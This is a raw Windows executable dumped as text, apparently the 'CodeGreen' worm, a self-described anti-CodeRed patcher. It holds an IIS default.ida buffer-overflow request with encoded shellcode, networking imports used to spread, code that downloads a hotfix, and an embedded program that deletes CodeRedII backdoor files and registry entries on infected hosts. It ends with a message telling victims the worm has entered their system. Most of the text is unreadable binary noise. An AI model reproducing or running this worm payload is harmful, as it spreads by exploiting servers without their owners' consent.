MZ                @                                       	!L!This program cannot be run in DOS mode.

$       }9tk9tk9tk9tk,tk5Te8tkRich9tk                        PE  L ;                          0                          `                                       H0  <                                                                                    0  H                           .text   .                          `.rdata     0                    @  @.data      @                     @                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ]  h @ j@PU  t  h@   $  u  	      3K`  <C 5  3ҹ  03ҹd   0F3ҹ
   0F0Faø' @ x ' @ | (( @  ( @  ( @  ( @  "( @  
( @  ' @  ' @ l  k  AhSu   |$󤍵%   fǅs   ƅr  ǅ    h@ h  e  j Tj U Pj j   X} P$   P  j Tj U Pj j   Xjd  fs 2 |h`    } R  ǅ     } R      ]+ HU+XU   x    v<   w6KERNuw?3B`$   ?auJڋ]    W7` PV҉D$a ` Vщa` Vщa` Vщa` Vщa^  `W6҉a23I:uG:tߍ SD ft
h $l SH j@h   h   j   a  S< fuS@ B    Èh   VL WV 
ua   0  >" `  >H$   >%   >ߋa +߱B  Qj h   jj j h   V0 Pj j RSWP4 XXP8 Y
ua  
t<u	u<uu	V33I/   󤍵   > u	ƅ OV8   OF  ^V  󤍵   ^fufFf.EXE ^j j j j N P j h   j j VS t(] Ph   VW t]     tƅ W S  k  AhSu   |$󤍵%   fǅs   ƅr  ǅ     j Tj U Pj j  X} Pt  Pt j Tj U Pj j  Xjdl fs 2 |Հ ] e a   h   j a (    QhO l } Rx ǅ     } R| Yƅr h  l u AX} P  P h $l l$fs H   j ܀r     u1  (} Rx   P} R| XЁ    tKЁ      tЁ      t)} Rx ǅ     } R| Yjjj C{   Wh~fs {  PGgGgG    G    jWs  Wj {   CGWj j  thtd  u=t {    Wh~fs  Rx j hk  u Ws  R| s ^H   X f3   ff=MZu`33IO+|$a`3Ɋg3Q3IY|$aËl$ V F3ɊN3  3ҊЀRl r u    j WWh  , `iAaj h   jj j h   W0 Yt,Pj j RSQP4 XXP8 uPj Wp X   XGetProcAddress LoadLibraryA  CodeGreen CodeRedII advapi32.dll user32.dll wsock32.dll wininet.dll                                                                                                                                                                                                         GetSystemDefaultLangID GetSystemTime CreateThread VirtualAlloc VirtualProtect VirtualFree GetTempPathA CreateFileA WriteFile CloseHandle GlobalFindAtomA GlobalAddAtomA FindAtomA AddAtomA SetFileAttributesA DeleteFileA CreateToolhelp32Snapshot Process32First Process32Next OpenProcess ReadProcessMemory TerminateProcess Sleep WinExec InitializeCriticalSection EnterCriticalSection LeaveCriticalSection DeleteCriticalSection ExitThread MoveFileA  RegOpenKeyExA RegDeleteValueA RegCloseKey  MessageBoxA  socket ioctlsocket connect select send closesocket  InternetOpenA InternetOpenUrlA InternetReadFile InternetCloseHandle   http://a .ms.a.microsoft.com/f/ /1611/2h/download.microsoft.com/download/win2000platform/Patch/q300972/NT5/ /Q300972_W2K_SP3_x86_ 134AR  138CN 133TW 150CS 128DA 144DE 132EL 131EN-US 137ES 117FI 106FR 106HE 139HU  100IT 117JA 148KO 122NL 111NO 116PL 110PT 137PT-BR  127RU    125SV  111TR CodeGreen V1.0         CG_Patch.exe                                                                                           GET /default.ida?Code_Green_<I_like_the_colour-_-><AntiCodeRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_to_my_sisterli_'Doro'.Save_Whale_and_visit_<www.buhaboard.de>_and_<www.buha-security.de>%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
Accept: */*
Content-length: 3379 

C:\explorer.exe C:\ex__X_er._X_ MZ                @                                       	!L!This program cannot be run in DOS mode.

$       }9tk9tk9tk9tk+tk5Te8tkRich9tk                        PE  L ;                                                    @                                       8   P                                                                                       8                           .text   `                          `.rdata                          @  @.data      0                    @    BÍ5 0=0h   V  WV  5-0h   V  V   5I0h   V   V   
u=t0j Tjj Wh     [50   `33IO+|$aQWjj VFS   OuS   h   h1o    t0=   )1 0   \t\Gjh1R   h@w B   h   h0h0j    j 
   %0 %  % % %$ % %( % % %  %    ^!  P!  p!         !     8!     !  0!                           0              B!                !                          ^!  P!  p!         !     8!     !  0!             MessageBoxA USER32.dll  T DeleteFileA u ExitProcess dGetWindowsDirectoryA  MoveFileA ISetFileAttributesA  sSleep WinExec KERNEL32.dll  ERegCloseKey NRegDeleteValueA \RegOpenKeyExA ADVAPI32.dllt   C:\explorer.exe C:\AntiCode.Red explorer.exe C:\inetpub\scripts\root.exe C:\progra~1\common~1\system\MSADC\root.exe SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /scripts /msadc /c /d Des HexXer's CodeGreen V1.0 beta CodeGreen has entered your system
it tried to patch your system and
to remove CodeRedII's backdoors


You may uninstall the patch via
SystemPanel/Sofware: Windows 2000 Hotfix [Q300972]

get details at "www.microsoft.com".
visit "www.buha-security.de"
   % 0 % 0 %0 %0 %0 %0 %0 %0 %0 %@0 %(0 %,0 %00 %40 %80 %<0                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   0  0  1  1  01  H1  X1  `1  0                  s      0          r1   0  0          1  (0                      0  0  1  1  01  H1  X1  `1  0                  s      H CreateThread  ^ EnterCriticalSection  GetLastError  HGetSystemTime InitializeCriticalSection LeaveCriticalSection  LoadLibraryA  sSleep VirtualProtect  KERNEL32.dll  WSOCK32.dll                                                                                                                         msvcrt.dll                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              